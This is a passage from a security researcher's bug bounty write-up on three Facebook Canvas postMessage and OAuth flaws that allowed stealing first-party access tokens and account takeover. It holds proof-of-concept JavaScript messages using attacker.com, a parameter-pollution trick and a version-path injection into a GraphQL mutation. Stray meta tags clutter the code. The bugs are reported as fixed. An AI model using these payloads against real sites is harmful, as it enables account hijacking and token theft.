            <span class="kd">var</span> <span class="nx">d</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">b</span><span class="p">.</span><span class="nx">version</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">/dialog/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">);</span>
            <span class="k">delete</span> <span class="nx">b</span><span class="p">.</span><span class="nx">version</span><span class="p">;</span>
            <span class="k">return</span> <span class="nx">d</span><span class="p">.</span><span class="nf">addQueryData</span><span class="p">(</span><span class="nx">b</span><span class="p">)</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformVersioning</span><span class="dl">"</span><span class="p">).</span><span class="nf">versionAwareURI</span><span class="p">(</span><span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/dialog/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">).</span><span class="nf">addQueryData</span><span class="p">(</span><span class="nx">b</span><span class="p">))</span>
    <span class="p">}</span>

<span class="p">}),</span> <span class="mi">98</span><span class="p">);</span>


</pre></td></tr></tbody></table></code></div></div>

<p>To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs :</p>

<p>Iframe sends message to parent <strong>=&gt;</strong> Message event dispatched in <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter <strong>=&gt;</strong> Message handler function passes data to handleMessage function <strong>=&gt;</strong> “enqueue” function passes to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;JSONRPC =&gt; <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;JSONRPC.read calls this.local.<meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;showDialog function in <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformAppController <strong>=&gt;</strong> function checks message and if all valid, call <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformDialogClient <strong>=&gt;</strong> <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformDialogClient.async sends a POST request to <strong>apps.facebook.com/dialog/oauth</strong> , returned access_token would be passed to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter.send function ( few steps were skipped ) <strong>=&gt;</strong> <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt; <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter.send would send a cross window message to the iframe window <strong>=&gt;</strong> Event dispatched in iframe window containing Facebook user access_token</p>

<p>Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span><span class="dl">"</span><span class="s2">jsonrpc</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">2.0</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://ysamm.com/callback</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="nx">IFRAME_ORIGIN</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Interested parts to manipulate are : <br />
– <strong>IFRAME_ORIGIN</strong>, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token<br />
– Keys and values of the object inside <strong>params</strong> , there are the parameters to be appended to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;apps.facebook.com/dialog/oauth. Most interesting ones are redirect_uri ( which can replace <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> in the POST request in some cases ) and <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>APP_ID</strong></p>

<p><strong>Attacks vectors/scenarios</strong></p>

<p>What we’ll do here is to try to instead of requesting an access token for the game application we own, we’ll try to get one of a Facebook first party application like Instagram. What’s holding us back is although we control the <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;IFRAME_ORIGIN and <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;APP_ID which we can set to match the Instagram application as www.instagram.com and 124024574287414, later the message sent to the iframe containing the first party access token would have a targetOrigin in postMessage as www.instagram.com which is not our window origin. Facebook did a good job protecting against these attacks ( i’ll argue though to why not using the origin from the event message received and matching app_id to the hosted game instead of giving us total freedom which could have prevented all these bugs ), but apparently they left some weaknesses that could have been exploited for many years.</p>

<p><strong>Bug 1: Parameter Pollution, it was checked server-side and we **definitely</strong> should trust it**</p>

<p>This bug occurs due to the fact that the POST request to <strong>https://apps.facebook.com/dialog/oauth</strong> when constructed from the received message from the iframe, could contain user controlled parameters. <br />
All parameters are checked in the client-side ( PlatformAppController, showDialog method and ,PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController , also AsyncRequest module seems to be doing some filtering ( removing parameters that already exist but brackets were appended to it ).</p>

<p>However due to some missing checking in the server-side, a parameter name set to <strong>PARAM[random</strong> would replace a previously set parameter <strong>PARAM</strong> ; for example <strong>redirect_uri[0</strong> parameter value would replace <strong>redirect_uri</strong>. We can abuse this as follow : <br />
1) Set <strong>APP_ID</strong> to be the Instagram application id. <br />
2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72 ) using <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> ( will end up <strong>https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com</strong> ) , which would be sent matching our iframe window origin but won’t be used at all as explained below. <br />
3) Set <strong>redirect_uri[0</strong> in <strong>params</strong> as an additional parameter ( order matters so it must be after <strong>redirect_uri</strong> ) to be <strong>https://www.instagram.com/accounts/signup</strong>/ which is a valid redirect_uri for the Instagram applicaiton.<br />
The URL of the POST request end up being something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nx">https</span><span class="p">:</span><span class="c1">//apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&amp;display=async&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&amp;app_id=124024574287414&amp;client_id=124024574287414&amp;response_type=token&amp;redirect_uri[0=https://www.instagram.com/accounts/signup/</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The request would end up being successful and returning a first party access token since <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;redirect_uri[0 replaces redirect_uri and it’s a valid redirect_uri. In the client side though, the logic is if an access_token was received it means that the origin used to construct the redirect_uri did work with the app_id and for that it should trust it and use to send the message to the iframe, behind the scenes though redirect_uri[0 was used and not redirect_uri ( Cool right?)</p>

<p><strong>Proof of concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://attacker.com/callback</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">124024574287414</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;124024574287414</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri[0</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://www.instagram.com/accounts/signup/</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>Bug 2: Why bothering, Origin is undefined</strong></p>

<p>The main problem for this one is that /dialog/oauth endpoint would accept <strong>https://www.facebook.com/dialog/return/arbiter</strong> as a valid redirect_uri ( without a valid origin in the fragment part ) for third-party applications and some first-party ones.<br />
The second problem is that this behaviour to occur ( no origin in the fragment part ), the message sent from the iframe to <strong>apps.facebook.com</strong> should not contain a.data.origin ( <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> is undefined ) , however this same value would be used later to send a cross window message to the iframe, if <strong>null</strong> or <strong>undefined</strong> is used, the message won’t be received. <br />
Likely, i noticed that <strong>JSONRPC</strong> function would always receive a not null origin of the postMessage ( Line 55 ) . Since b.origin is undefined or null, <strong>k</strong> would be chosen. <strong>k</strong> could be set by the attacker by first registering a valid origin via <strong>c(“Arbiter”).subscribe(“XdArbiter/register”)</strong> which could be informed if our message had <strong>xdArbiterRegister</strong> and a specified origin . Before “<strong>k</strong>” variable is set, the supplied origin would be checked first if it belongs to the attacker application using “<strong>/platform/app_owned_url_check/</strong>” endpoint.<br />
This is wrong and the second problem occurs here since we can’t ensure that the user in the next cross origin message sent from the iframe would supply the same <strong>APP_ID</strong>.</p>

<p>Not all first-party applications are vulnerable to this though. I used the Facebook Watch for Android application or Portal to get a first party access_token.</p>

<p>The URL of the POST request would be something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;https:/</span><span class="o">/</span><span class="nx">apps</span><span class="p">.</span><span class="nx">facebook</span><span class="p">.</span><span class="nx">com</span><span class="o">/</span><span class="nx">dialog</span><span class="o">/</span><span class="nx">oauth</span><span class="p">?</span><span class="nx">state</span><span class="o">=</span><span class="nx">f36be3f648ddfb</span><span class="o">&amp;</span><span class="nx">display</span><span class="o">=</span><span class="k">async</span><span class="o">&amp;</span><span class="nx">redirect_uri</span><span class="o">=&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;https:/</span><span class="o">/</span><span class="nx">www</span><span class="p">.</span><span class="nx">facebook</span><span class="p">.</span><span class="nx">com</span><span class="o">/</span><span class="nx">dialog</span><span class="o">/</span><span class="k">return</span><span class="sr">/arbiter&amp;app_id=&lt;meta content="text/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390&amp;client_id=&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390&amp;response_type=token
</span></pre></td></tr></tbody></table></code></div></div>

<p><strong>Proof Of Concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">({</span><span class="na">xdArbiterRegister</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">origin</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">},</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">)</span>

<span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">1348564698517390</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>Bug 3</strong>: <strong>Total</strong> <strong>Chaos</strong>, <strong>version can’t be harmful</strong></p>

<p>This bug one occurs in <strong>PlatformDialogClient.getURI</strong> function which is responsible of setting the API version before /dialog/oauth endpoint. This function didn’t check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request ( Line 86 ).<br />
The <strong>version</strong> property in <strong>params</strong> passed in the cross window message sent to <strong>apps.facebook.com</strong> could be set to <strong>api/graphql/?doc_id=DOC_ID&amp;variables=VAR#</strong> and would eventually lead to a POST request sent to the GraphQL endpoint with valid user CSRF token.</p>

<p><strong>DOC_ID</strong> and <strong>VAR</strong> could be set to an id of a GraphQL Mutation to add a phone number to the attacount, and the variables of this mutation.</p>

<p>The URL of the POST request would be something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nx">https</span><span class="p">:</span><span class="c1">//apps.facebook.com/api/graphql?doc_id=DOC_ID&amp;variables=VAR&amp;?/dialog/oauth&amp;state=f36be3f648ddfb&amp;display=async&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&amp;app_id=1348564698517390&amp;client_id=1348564698517390&amp;response_type=token</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>Proof Of Concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">version</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;api/graphql?doc_id=DOC_ID&amp;variables=VAR&amp;</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>Timeline</strong></p>

<ol>
  <li>Aug 4, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 4, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 6, 2021— Fixed by Facebook<br />
 Sep 2, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
  <li>Aug 9, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 9, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 12, 2021— Fixed by Facebook<br />
 Aug 31, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
  <li>Aug 12, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 13, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 17, 2021— Fixed by Facebook<br />
 Sep 2, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
</ol>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories 
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/categories/uncategorized/'>Uncategorized</a>
  </div>
  
  -->
  <!-- tags 
  
  -->
  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=More%20secure%20Facebook%20Canvas%20:%20Tale%20of%20$126k%20worth%20of%20bugs%20that%20lead%20to%20Facebook%20Account%20Takeovers%20-%20Youssef%20Sammouda&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fmore-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.linkedin.com/sharing/share-offsite/?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fmore-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers%2F" data-toggle="tooltip" data-placement="top"
          title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin">
          <i class="fa-fw fab fa-linkedin"></i>
        </a>
    
      
